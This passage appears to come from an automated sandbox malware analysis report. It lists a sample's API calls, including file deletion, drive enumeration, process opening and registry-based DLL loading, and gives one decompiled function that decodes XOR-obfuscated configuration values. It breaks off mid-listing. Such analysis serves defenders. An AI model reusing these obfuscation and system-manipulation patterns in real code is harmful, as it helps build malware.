                          • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,05B860E0,0000002C,05B790D3,05FB8E36,?,00000000,05B7A484,?,00000318), ref: 05B81EB7
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeVirtual
                          • String ID:
                          • API String ID: 1263568516-0
                          • Opcode ID: d9bb14fada165b096fbf15f93da4acbe204d76277e7f57e33c0b4308d2b13e4f
                          • Instruction ID: 67c3043a29e9d81a0d986367901c64cf5309f9c6aa434356d4a9d8f74b7e1ffa
                          • Opcode Fuzzy Hash: d9bb14fada165b096fbf15f93da4acbe204d76277e7f57e33c0b4308d2b13e4f
                          • Instruction Fuzzy Hash: CDD01730E01219EBCB20AF98DC4A9AEFBB1BF08721F608264E860731D0C7302916CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions

                          Function 05B7BAD1 Relevance: 28.7, APIs: 19, Instructions: 234stringfilesynchronizationCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                            • Part of subcall function 05B721B6: ExpandEnvironmentStringsW.KERNEL32(05B6AEB5,00000000,00000000,00000001,00000000,00000000,05B6E448,05B6AEB5,00000000,05B6E448,?), ref: 05B721CD
                            • Part of subcall function 05B721B6: ExpandEnvironmentStringsW.KERNEL32(05B6AEB5,00000000,00000000,00000000), ref: 05B721E7
                          • lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 05B7BB1D
                          • lstrlenW.KERNEL32(?,?,00000000), ref: 05B7BB29
                          • memset.NTDLL ref: 05B7BB71
                          • FindFirstFileW.KERNEL32(00000000,00000000), ref: 05B7BB8C
                          • lstrlenW.KERNEL32(0000002C), ref: 05B7BBC4
                          • lstrlenW.KERNEL32(?), ref: 05B7BBCC
                          • memset.NTDLL ref: 05B7BBEF
                          • wcscpy.NTDLL ref: 05B7BC01
                          • PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 05B7BC27
                          • RtlEnterCriticalSection.NTDLL(?), ref: 05B7BC5D
                            • Part of subcall function 05B7E803: RtlFreeHeap.NTDLL(00000000,?,05B73953,?,?,05B7BF5B,00000000,00000000,05B610B0,00000000,05B89F2C,00000008,00000003), ref: 05B7E80F
                          • RtlLeaveCriticalSection.NTDLL(?), ref: 05B7BC79
                          • FindNextFileW.KERNEL32(?,00000000), ref: 05B7BC92
                          • WaitForSingleObject.KERNEL32(00000000), ref: 05B7BCA4
                          • FindClose.KERNEL32(?), ref: 05B7BCB9
                          • FindFirstFileW.KERNEL32(00000000,00000000), ref: 05B7BCCD
                          • lstrlenW.KERNEL32(0000002C), ref: 05B7BCEF
                          • FindNextFileW.KERNEL32(?,00000000), ref: 05B7BD65
                          • WaitForSingleObject.KERNEL32(00000000), ref: 05B7BD77
                          • FindClose.KERNEL32(?), ref: 05B7BD92
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$Filelstrlen$CloseCriticalEnvironmentExpandFirstHeapNextObjectSectionSingleStringsWaitmemset$AllocateEnterFreeLeaveNamePathwcscpy
                          • String ID:
                          • API String ID: 2962561936-0
                          • Opcode ID: cdfc4c0317f6b970399b304cf06702990d4948e6108285e479e478592ce2f14a
                          • Instruction ID: 5186629dc159873cf0f7b361439e7ed5dd724ea2ece88d3c0ce7a0207ee9344f
                          • Opcode Fuzzy Hash: cdfc4c0317f6b970399b304cf06702990d4948e6108285e479e478592ce2f14a
                          • Instruction Fuzzy Hash: 40814C71508349AFC720AF24DC89A2BBBE9FF88304F444859F5A697151EB74F905CF52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B610C7 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 130libraryloadernativeCOMMON
                          Download Yara Rule
                          APIs
                          • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 05B610FA
                          • GetLastError.KERNEL32 ref: 05B61108
                          • NtSetInformationProcess.NTDLL ref: 05B61162
                          • GetProcAddress.KERNEL32(?,00000000), ref: 05B611A1
                          • GetProcAddress.KERNEL32(?), ref: 05B611C2
                          • TerminateThread.KERNEL32(?,00000000,?,00000004,00000000), ref: 05B61219
                          • CloseHandle.KERNEL32(?), ref: 05B6122F
                          • CloseHandle.KERNEL32(?), ref: 05B61255
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressCloseHandleProcProcess$ErrorInformationLastOpenTerminateThread
                          • String ID: v
                          • API String ID: 3529370251-1801730948
                          • Opcode ID: 4cbe8c4979751adfda413fbf772c5edee0a46c6292432f5f4124e0e9671a093b
                          • Instruction ID: f66a8dbd1c685321df1e410434146bd2b0d62debcc7b7f326643cd5089550068
                          • Opcode Fuzzy Hash: 4cbe8c4979751adfda413fbf772c5edee0a46c6292432f5f4124e0e9671a093b
                          • Instruction Fuzzy Hash: 4041BD71108345AFD711EF28C889A2ABFF6FB88318F104A6AF555E3150DB74FA49CB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B6B238 Relevance: 18.5, APIs: 12, Instructions: 519memoryCOMMON
                          Download Yara Rule
                          APIs
                          • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 05B6B270
                          • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 05B6B2A2
                          • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 05B6B2D4
                          • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 05B6B306
                          • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 05B6B338
                          • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 05B6B36A
                          • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 05B6B39C
                          • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 05B6B3CE
                          • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 05B6B400
                          • HeapFree.KERNEL32(00000000,?,?,?,?,76CDF710,00000000,00000000), ref: 05B6B593
                          • StrToIntExA.SHLWAPI(00000000,00000000,?,?,?,?,76CDF710,00000000,00000000), ref: 05B6B637
                            • Part of subcall function 05B77736: RtlAllocateHeap.NTDLL ref: 05B77777
                            • Part of subcall function 05B77736: memset.NTDLL ref: 05B7778B
                            • Part of subcall function 05B77736: GetCurrentThreadId.KERNEL32 ref: 05B77818
                            • Part of subcall function 05B77736: GetCurrentThread.KERNEL32 ref: 05B7782B
                            • Part of subcall function 05B66537: RtlEnterCriticalSection.NTDLL(05FBC2D0), ref: 05B66540
                            • Part of subcall function 05B66537: HeapFree.KERNEL32(00000000,?), ref: 05B66572
                            • Part of subcall function 05B66537: RtlLeaveCriticalSection.NTDLL(05FBC2D0), ref: 05B66590
                          • HeapFree.KERNEL32(00000000,?,?,?,?,76CDF710,00000000,00000000), ref: 05B6B5DF
                            • Part of subcall function 05B6D4DA: lstrlen.KERNEL32(?,00000000,76C86980,00000000,05B6DA7B,?), ref: 05B6D4E3
                            • Part of subcall function 05B6D4DA: memcpy.NTDLL(00000000,?,00000000,?), ref: 05B6D506
                            • Part of subcall function 05B6D4DA: memset.NTDLL ref: 05B6D515
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Free$CriticalCurrentSectionThreadmemset$AllocateEnterLeavelstrlenmemcpy
                          • String ID:
                          • API String ID: 3296958911-0
                          • Opcode ID: 6b835ca91c4a9976b06f09e352fc046a032a74624ff6834290324fd704e12a0f
                          • Instruction ID: a4d258dc8ae9f5220253b8c0defbb8309e18941f8fa7029457355e3d5144eca4
                          • Opcode Fuzzy Hash: 6b835ca91c4a9976b06f09e352fc046a032a74624ff6834290324fd704e12a0f
                          • Instruction Fuzzy Hash: C4F190B1B24215ABCB10FBB48885D7F77FAFB0865075549A5B902EB200EE38F941C7A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B6FD47 Relevance: 16.6, APIs: 11, Instructions: 94memorystringsynchronizationCOMMON
                          Download Yara Rule
                          APIs
                          • wcscpy.NTDLL ref: 05B6FD7B
                          • GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 05B6FD87
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05B6FD98
                          • memset.NTDLL ref: 05B6FDB5
                          • GetLogicalDriveStringsW.KERNEL32(?,?), ref: 05B6FDC3
                          • WaitForSingleObject.KERNEL32(00000000), ref: 05B6FDD1
                          • GetDriveTypeW.KERNEL32(?), ref: 05B6FDDF
                          • lstrlenW.KERNEL32(?), ref: 05B6FDEB
                          • wcscpy.NTDLL ref: 05B6FDFD
                          • lstrlenW.KERNEL32(?), ref: 05B6FE17
                          • HeapFree.KERNEL32(00000000,?), ref: 05B6FE30
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Drive$HeapLogicalStringslstrlenwcscpy$AllocateFreeObjectSingleTypeWaitmemset
                          • String ID:
                          • API String ID: 3888849384-0
                          • Opcode ID: 1e3015710565578f945736a821f7e13da84f9f976fd9286ebaf1d225090983b7
                          • Instruction ID: 1b115ceb00eee17bdcfba22f1d7e99cee35692aabaf24a113241a8b591aa26be
                          • Opcode Fuzzy Hash: 1e3015710565578f945736a821f7e13da84f9f976fd9286ebaf1d225090983b7
                          • Instruction Fuzzy Hash: 2D311676810108BFDB11ABA4E889CBEBFBEFB09224B105466F501A7151EA35BE45DB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B6EC00 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 87registrylibraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,00000001), ref: 05B6EC1B
                          • RegCloseKey.ADVAPI32(00000001,?,00000008,?,00000001), ref: 05B6ECD3
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • LoadLibraryA.KERNEL32(00000000,?,00000008,?,00000001), ref: 05B6EC69
                          • GetProcAddress.KERNEL32(00000000,?), ref: 05B6EC82
                          • GetLastError.KERNEL32(?,00000008,?,00000001), ref: 05B6ECA1
                          • FreeLibrary.KERNEL32(00000000,?,00000008,?,00000001), ref: 05B6ECB3
                          • GetLastError.KERNEL32(?,00000008,?,00000001), ref: 05B6ECBB
                          Strings
                          • Software\Microsoft\WAB\DLLPath, xrefs: 05B6EC0C
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLastLibrary$AddressAllocateCloseFreeHeapLoadOpenProc
                          • String ID: Software\Microsoft\WAB\DLLPath
                          • API String ID: 1628847533-3156921957
                          • Opcode ID: 5139b666702245fffa22d26b0aa4216bbbdba280eac7f22f94a97296e77ab38e
                          • Instruction ID: 3e823bee74ff072373781e5499517fc2a2e4117c28da25fd420cbad1b1af86b0
                          • Opcode Fuzzy Hash: 5139b666702245fffa22d26b0aa4216bbbdba280eac7f22f94a97296e77ab38e
                          • Instruction Fuzzy Hash: 4F219275900518FFCB21ABA8DC99CBFBF7EEB84650B1401A1F912A7210EA35BE40DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01001645 Relevance: 12.3, APIs: 8, Instructions: 258memoryCOMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 93%
                          			E01001645(void* __ebx, int* __ecx, void* __edi, void* __esi) {
				int _v8;
				void* _v12;
				void* _v16;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				signed int _t65;
				signed int _t70;
				void* _t72;
				void* _t73;
				signed int _t75;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				void* _t101;
				void* _t102;
				void* _t115;
				void* _t118;
				intOrPtr _t121;

				_t118 = __esi;
				_t115 = __edi;
				_t104 = __ecx;
				_t101 = __ebx;
				_t28 =  *0x100a344; // 0x69b25f44
				if(E01007780( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
					 *0x100a378 = _v8;
				}
				_t33 =  *0x100a344; // 0x69b25f44
				if(E01007780( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L69:
					return _v12;
				}
				_t39 =  *0x100a344; // 0x69b25f44
				_push(_t115);
				if(E01007780( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L67:
					HeapFree( *0x100a2d8, 0, _v16);
					goto L69;
				} else {
					_push(_t101);
					_t102 = _v12;
					if(_t102 == 0) {
						_t45 = 0;
					} else {
						_t98 =  *0x100a344; // 0x69b25f44
						_t45 = E01005450(_t104, _t102, _t98 ^ 0x7895433b);
					}
					_push(_t118);
					if(_t45 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x100a2e0 = _v8;
						}
					}
					if(_t102 == 0) {
						_t46 = 0;
					} else {
						_t94 =  *0x100a344; // 0x69b25f44
						_t46 = E01005450(_t104, _t102, _t94 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x100a2e4 = _v8;
						}
					}
					if(_t102 == 0) {
						_t47 = 0;
					} else {
						_t90 =  *0x100a344; // 0x69b25f44
						_t47 = E01005450(_t104, _t102, _t90 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x100a2e8 = _v8;
						}
					}
					if(_t102 == 0) {
						_t48 = 0;
					} else {
						_t86 =  *0x100a344; // 0x69b25f44
						_t48 = E01005450(_t104, _t102, _t86 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0x100a004 = _v8;
						}
					}
					if(_t102 == 0) {
						_t49 = 0;
					} else {
						_t82 =  *0x100a344; // 0x69b25f44
						_t49 = E01005450(_t104, _t102, _t82 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0x100a02c = _v8;
						}
					}
					if(_t102 == 0) {
						_t50 = 0;
					} else {
						_t78 =  *0x100a344; // 0x69b25f44
						_t50 = E01005450(_t104, _t102, _t78 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0x100a2ec = 5;
						goto L42;
					} else {
						_t104 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t102 == 0) {
								_t51 = 0;
							} else {
								_t75 =  *0x100a344; // 0x69b25f44
								_t51 = E01005450(_t104, _t102, _t75 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E01002FBC(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E010072C7();
								}
							}
							if(_t102 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0x100a344; // 0x69b25f44
								_t52 = E01005450(_t104, _t102, _t70 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E01002FBC(0, _t52) != 0) {
								_t121 =  *0x100a3cc; // 0x52995b0
								E0100765B(_t121 + 4, _t68);
							}
							if(_t102 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0x100a344; // 0x69b25f44
								_t53 = E01005450(_t104, _t102, _t65 ^ 0x3df17130);
							}
							if(_t53 == 0) {
								L59:
								_t54 =  *0x100a348; // 0x428d5a8
								_t22 = _t54 + 0x100b252; // 0x616d692f
								 *0x100a374 = _t22;
								goto L60;
							} else {
								_t64 = E01002FBC(0, _t53);
								 *0x100a374 = _t64;
								if(_t64 != 0) {
									L60:
									if(_t102 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0x100a344; // 0x69b25f44
										_t56 = E01005450(_t104, _t102, _t61 ^ 0xd2079859);
									}
									if(_t56 == 0) {
										_t57 =  *0x100a348; // 0x428d5a8
										_t23 = _t57 + 0x100b79e; // 0x6976612e
										_t58 = _t23;
									} else {
										_t58 = E01002FBC(0, _t56);
									}
									 *0x100a3e0 = _t58;
									HeapFree( *0x100a2d8, 0, _t102);
									_v12 = 0;
									goto L67;
								}
								goto L59;
							}
						}
					}
				}
			}








































                          0x01001645
                          0x01001645
                          0x01001645
                          0x01001645
                          0x01001648
                          0x01001665
                          0x01001673
                          0x01001673
                          0x01001678
                          0x01001692
                          0x01001900
                          0x01001907
                          0x0100190b
                          0x0100190b
                          0x01001698
                          0x0100169d
                          0x010016b5
                          0x010018ed
                          0x010018f7
                          0x00000000
                          0x010016bb
                          0x010016bb
                          0x010016bc
                          0x010016c1
                          0x010016d7
                          0x010016c3
                          0x010016c3
                          0x010016d0
                          0x010016d0
                          0x010016d9
                          0x010016e2
                          0x010016e4
                          0x010016ee
                          0x010016f3
                          0x010016f3
                          0x010016ee
                          0x010016fa
                          0x01001710
                          0x010016fc
                          0x010016fc
                          0x01001709
                          0x01001709
                          0x01001714
                          0x01001716
                          0x01001720
                          0x01001725
                          0x01001725
                          0x01001720
                          0x0100172c
                          0x01001742
                          0x0100172e
                          0x0100172e
                          0x0100173b
                          0x0100173b
                          0x01001746
                          0x01001748
                          0x01001752
                          0x01001757
                          0x01001757
                          0x01001752
                          0x0100175e
                          0x01001774
                          0x01001760
                          0x01001760
                          0x0100176d
                          0x0100176d
                          0x01001778
                          0x0100177a
                          0x01001784
                          0x01001789
                          0x01001789
                          0x01001784
                          0x01001790
                          0x010017a6
                          0x01001792
                          0x01001792
                          0x0100179f
                          0x0100179f
                          0x010017aa
                          0x010017ac
                          0x010017b6
                          0x010017bb
                          0x010017bb
                          0x010017b6
                          0x010017c2
                          0x010017d8
                          0x010017c4
                          0x010017c4
                          0x010017d1
                          0x010017d1
                          0x010017dc
                          0x010017ef
                          0x010017ef
                          0x00000000
                          0x010017de
                          0x010017de
                          0x010017e8
                          0x00000000
                          0x010017f9
                          0x010017f9
                          0x010017fb
                          0x01001811
                          0x010017fd
                          0x010017fd
                          0x0100180a
                          0x0100180a
                          0x01001815
                          0x01001817
                          0x0100181a
                          0x0100181b
                          0x01001822
                          0x01001824
                          0x01001825
                          0x01001825
                          0x01001822
                          0x0100182c
                          0x01001842
                          0x0100182e
                          0x0100182e
                          0x0100183b
                          0x0100183b
                          0x01001846
                          0x01001854
                          0x0100185e
                          0x0100185e
                          0x01001866
                          0x0100187c
                          0x01001868
                          0x01001868
                          0x01001875
                          0x01001875
                          0x01001880
                          0x01001893
                          0x01001893
                          0x01001898
                          0x0100189e
                          0x00000000
                          0x01001882
                          0x01001885
                          0x0100188a
                          0x01001891
                          0x010018a3
                          0x010018a5
                          0x010018bb
                          0x010018a7
                          0x010018a7
                          0x010018b4
                          0x010018b4
                          0x010018bf
                          0x010018cb
                          0x010018d0
                          0x010018d0
                          0x010018c1
                          0x010018c4
                          0x010018c4
                          0x010018de
                          0x010018e3
                          0x010018e9
                          0x00000000
                          0x010018ec
                          0x00000000
                          0x01001891
                          0x01001880
                          0x010017e8
                          0x010017dc

                          APIs
                          • StrToIntExA.SHLWAPI(00000000,00000000,?,0100A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 010016EA
                          • StrToIntExA.SHLWAPI(00000000,00000000,?,0100A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 0100171C
                          • StrToIntExA.SHLWAPI(00000000,00000000,?,0100A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 0100174E
                          • StrToIntExA.SHLWAPI(00000000,00000000,?,0100A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 01001780
                          • StrToIntExA.SHLWAPI(00000000,00000000,?,0100A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 010017B2
                          • StrToIntExA.SHLWAPI(00000000,00000000,?,0100A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 010017E4
                          • HeapFree.KERNEL32(00000000,?,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 010018E3
                          • HeapFree.KERNEL32(00000000,?,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 010018F7
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: FreeHeap
                          • String ID:
                          • API String ID: 3298025750-0
                          • Opcode ID: b9c31f7fb3d2af706915fbfa725b820f35108f2c8617d8990f06b119d664e045
                          • Instruction ID: 768052cf464316763ca2876af58978b98943eb9fa568c1ab5427e8d2d138ca19
                          • Opcode Fuzzy Hash: b9c31f7fb3d2af706915fbfa725b820f35108f2c8617d8990f06b119d664e045
                          • Instruction Fuzzy Hash: 8581A274B00205EBF763DBB8DD88D9F7BF9BB48740F244965B185D3184EA7AEA448B10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B665C2 Relevance: 12.1, APIs: 8, Instructions: 111stringfileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B68669: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,?,?,?,05B62028,?), ref: 05B6867A
                            • Part of subcall function 05B68669: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000,?,?,?,05B62028,?), ref: 05B68697
                          • FreeLibrary.KERNEL32(?), ref: 05B666F8
                            • Part of subcall function 05B7AFC2: lstrlenW.KERNEL32(?,00000000,?,?,?,05B6663D,?,?), ref: 05B7AFCF
                            • Part of subcall function 05B7AFC2: GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,05B6663D,?,?), ref: 05B7AFF8
                            • Part of subcall function 05B7AFC2: lstrcpyW.KERNEL32(-0000FFFE,?), ref: 05B7B018
                            • Part of subcall function 05B7AFC2: lstrcpyW.KERNEL32(-00000002,?), ref: 05B7B034
                            • Part of subcall function 05B7AFC2: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,05B6663D,?,?), ref: 05B7B040
                            • Part of subcall function 05B7AFC2: LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,?,05B6663D,?,?), ref: 05B7B043
                            • Part of subcall function 05B7AFC2: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,05B6663D,?,?), ref: 05B7B04F
                            • Part of subcall function 05B7AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 05B7B06C
                            • Part of subcall function 05B7AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 05B7B086
                            • Part of subcall function 05B7AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 05B7B09C
                            • Part of subcall function 05B7AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 05B7B0B2
                            • Part of subcall function 05B7AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 05B7B0C8
                            • Part of subcall function 05B7AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 05B7B0DE
                          • FindFirstFileW.KERNEL32(?,?,?,?), ref: 05B6664E
                          • lstrlenW.KERNEL32(?), ref: 05B6666A
                          • lstrlenW.KERNEL32(?), ref: 05B66682
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • lstrcpyW.KERNEL32(00000000,?), ref: 05B6669B
                          • lstrcpyW.KERNEL32(00000002), ref: 05B666B0
                            • Part of subcall function 05B81C9B: lstrlenW.KERNEL32(?,00000000,76CC8250,76C869A0,?,?,?,05B666C0,?,00000000,?), ref: 05B81CAB
                            • Part of subcall function 05B81C9B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,05B666C0,?,00000000,?), ref: 05B81CCD
                            • Part of subcall function 05B81C9B: lstrcpyW.KERNEL32(00000000,?), ref: 05B81CF9
                            • Part of subcall function 05B81C9B: lstrcatW.KERNEL32(00000000,?), ref: 05B81D0C
                          • FindNextFileW.KERNEL32(?,00000010), ref: 05B666D8
                          • FindClose.KERNEL32(00000002), ref: 05B666E6
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$lstrcpy$lstrlen$CurrentDirectoryFind$EnvironmentExpandFileLibraryStrings$AllocateByteCharCloseFirstFreeHeapLoadMultiNextWidelstrcat
                          • String ID:
                          • API String ID: 1209511739-0
                          • Opcode ID: ae4a7d231a1e17be1bfee89806bd4c27f7ba67779300cf9e9052460bb19ef7ed
                          • Instruction ID: 1b11d1b17c9b4ce10cb821788addbb86afe93c9b912c28f99a4c39aedbfb05d7
                          • Opcode Fuzzy Hash: ae4a7d231a1e17be1bfee89806bd4c27f7ba67779300cf9e9052460bb19ef7ed
                          • Instruction Fuzzy Hash: 89416A71508345ABC711EF60E848A6FBBE9FF84B04F040969F594E3150EB34E909CB92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B699BC Relevance: 10.6, APIs: 7, Instructions: 109filestringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlenW.KERNEL32(?,00000000), ref: 05B699D4
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • FindFirstFileW.KERNEL32(?,00000000,?,0000000A,00000208), ref: 05B69A3D
                          • lstrlenW.KERNEL32(0000002C,?,0000000A,00000208), ref: 05B69A65
                          • RemoveDirectoryW.KERNEL32(?,?,0000000A,00000208), ref: 05B69AB7
                          • DeleteFileW.KERNEL32(?,?,0000000A,00000208), ref: 05B69AC2
                          • FindNextFileW.KERNEL32(?,00000000,?,0000000A,00000208), ref: 05B69AD5
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Findlstrlen$AllocateDeleteDirectoryFirstHeapNextRemove
                          • String ID:
                          • API String ID: 499515686-0
                          • Opcode ID: a9b3913b9a7213c70ff17033a4e05d55699d7813f2fc9a02c940680b791c91e6
                          • Instruction ID: 10bb3dbfa22539956267fdf58443d0a7dd2b6f6315da5ec4eb36f5c9e0b0457d
                          • Opcode Fuzzy Hash: a9b3913b9a7213c70ff17033a4e05d55699d7813f2fc9a02c940680b791c91e6
                          • Instruction Fuzzy Hash: 9941177590020AEFDF11EFA4CD89AAE7FB9FF00354F1440A5E511AB190EB78EA44DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7EAC5 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101COMMON
                          Download Yara Rule
                          APIs
                          • memset.NTDLL ref: 05B7EAE7
                            • Part of subcall function 05B77950: NtAllocateVirtualMemory.NTDLL(05B7EB0F,00000000,00000000,05B7EB0F,00003000,00000040), ref: 05B77981
